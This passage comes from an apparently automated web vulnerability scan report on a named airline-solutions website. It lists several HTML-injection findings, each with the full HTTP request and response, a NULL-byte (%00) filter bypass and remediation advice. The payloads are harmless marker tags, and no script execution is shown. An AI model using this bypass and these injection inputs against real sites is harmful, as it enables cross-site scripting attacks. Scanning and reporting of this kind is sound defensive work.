Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fascend%2Ferror%2F%22%3Bi%3A1%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A4%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:42:30 GMT
Pragma: no-cache
Content-Length: 7098
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/ascend/error/?%007d0b4"><a>0bfb3bd1f3c=1">
...[SNIP]...

3.31. http://www.sabreairlinesolutions.com/home/ascend/past_editions [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/past_editions

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %003813b<a>beec50d4773 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3813b<a>beec50d4773 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/past_editions?%003813b<a>beec50d4773=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321543; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:53:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321543; expires=Thu, 06-Oct-2011 09:53:29 GMT; path=/
Set-Cookie: exp_last_activity=1286376803; expires=Thu, 06-Oct-2011 09:53:29 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fascend%2Fpast_editions%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A2%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A3%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A4%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:53:42 GMT
Pragma: no-cache
Content-Length: 7732
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>beec50d4773=1">past editions?%003813b<a>beec50d4773=1</a>
...[SNIP]...

3.32. http://www.sabreairlinesolutions.com/home/ascend/past_editions [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/past_editions

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00bfa83"><a>c79bbe5d840 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bfa83"><a>c79bbe5d840 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/past_editions?%00bfa83"><a>c79bbe5d840=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321543; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:48:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321543; expires=Thu, 06-Oct-2011 09:48:24 GMT; path=/
Set-Cookie: exp_last_activity=1286376504; expires=Thu, 06-Oct-2011 09:48:24 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fascend%2Fpast_editions%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A2%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A3%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A4%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:48:37 GMT
Pragma: no-cache
Content-Length: 7736
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/ascend/past_editions?%00bfa83"><a>c79bbe5d840=1">
...[SNIP]...

3.33. http://www.sabreairlinesolutions.com/home/ascend/past_editions/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/past_editions/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00b1d68<a>0439c7c0b28 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1d68<a>0439c7c0b28 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/past_editions/?%00b1d68<a>0439c7c0b28=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/ascend
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321341; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A37%3A%22%2Fabout%2Fexecutive_team%2Fgreg_gilchrist%2F%22%3Bi%3A2%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A7%3A%22%2Fabout%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:34:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321341; expires=Thu, 06-Oct-2011 09:34:43 GMT; path=/
Set-Cookie: exp_last_activity=1286375683; expires=Thu, 06-Oct-2011 09:34:43 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fascend%2Fpast_editions%2F%22%3Bi%3A1%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A2%3Bs%3A37%3A%22%2Fabout%2Fexecutive_team%2Fgreg_gilchrist%2F%22%3Bi%3A3%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:35:02 GMT
Pragma: no-cache
Content-Length: 7780
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>0439c7c0b28=1">?%00b1d68<a>0439c7c0b28=1</a>
...[SNIP]...

3.34. http://www.sabreairlinesolutions.com/home/ascend/past_editions/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/past_editions/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %005f440"><a>15f7641391c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5f440"><a>15f7641391c in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/past_editions/?%005f440"><a>15f7641391c=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/ascend
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321341; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A37%3A%22%2Fabout%2Fexecutive_team%2Fgreg_gilchrist%2F%22%3Bi%3A2%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A7%3A%22%2Fabout%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:29:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321341; expires=Thu, 06-Oct-2011 09:29:19 GMT; path=/
Set-Cookie: exp_last_activity=1286375359; expires=Thu, 06-Oct-2011 09:29:19 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fascend%2Fpast_editions%2F%22%3Bi%3A1%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A2%3Bs%3A37%3A%22%2Fabout%2Fexecutive_team%2Fgreg_gilchrist%2F%22%3Bi%3A3%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:29:39 GMT
Pragma: no-cache
Content-Length: 7784
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/ascend/past_editions/?%005f440"><a>15f7641391c=1">
...[SNIP]...

3.35. http://www.sabreairlinesolutions.com/home/ascend/subscribe [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/subscribe

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00bb836<a>0b6cf4318e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bb836<a>0b6cf4318e4 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/subscribe?%00bb836<a>0b6cf4318e4=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/ascend
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321377; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A1%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fabout%2Fmedia_press%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:49:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321377; expires=Thu, 06-Oct-2011 09:49:12 GMT; path=/
Set-Cookie: exp_last_activity=1286376552; expires=Thu, 06-Oct-2011 09:49:12 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A1%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A2%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fabout%2Fmedia_press%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:49:28 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 26514


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>0b6cf4318e4=1">subscribe?%00bb836<a>0b6cf4318e4=1</a>
...[SNIP]...

3.36. http://www.sabreairlinesolutions.com/home/ascend/subscribe [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/subscribe

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0091ac9"><a>933075383e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 91ac9"><a>933075383e5 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/subscribe?%0091ac9"><a>933075383e5=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/ascend
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321377; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A1%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fabout%2Fmedia_press%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:44:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321377; expires=Thu, 06-Oct-2011 09:44:13 GMT; path=/
Set-Cookie: exp_last_activity=1286376252; expires=Thu, 06-Oct-2011 09:44:13 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A1%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A2%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fabout%2Fmedia_press%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:44:27 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 26518


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/ascend/subscribe?%0091ac9"><a>933075383e5=1">
...[SNIP]...

3.37. http://www.sabreairlinesolutions.com/home/ascend/subscribe/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/subscribe/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00e964d<a>cff7214ce32 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e964d<a>cff7214ce32 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/subscribe/?%00e964d<a>cff7214ce32=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/ascend
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321333; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3Bi%3A1%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A4%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Foperations_user_conference2%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:40:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321333; expires=Thu, 06-Oct-2011 09:40:21 GMT; path=/
Set-Cookie: exp_last_activity=1286376020; expires=Thu, 06-Oct-2011 09:40:21 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3Bi%3A2%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:40:38 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 26558


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>cff7214ce32=1">?%00e964d<a>cff7214ce32=1</a>
...[SNIP]...

3.38. http://www.sabreairlinesolutions.com/home/ascend/subscribe/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/ascend/subscribe/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00dd50a"><a>ad2e0e8eeb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dd50a"><a>ad2e0e8eeb in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/ascend/subscribe/?%00dd50a"><a>ad2e0e8eeb=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/ascend
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321333; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3Bi%3A1%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A4%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Foperations_user_conference2%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:35:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321333; expires=Thu, 06-Oct-2011 09:35:57 GMT; path=/
Set-Cookie: exp_last_activity=1286375757; expires=Thu, 06-Oct-2011 09:35:57 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3Bi%3A2%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:36:06 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 26560


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/ascend/subscribe/?%00dd50a"><a>ad2e0e8eeb=1">
...[SNIP]...

3.39. http://www.sabreairlinesolutions.com/home/business_issues [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
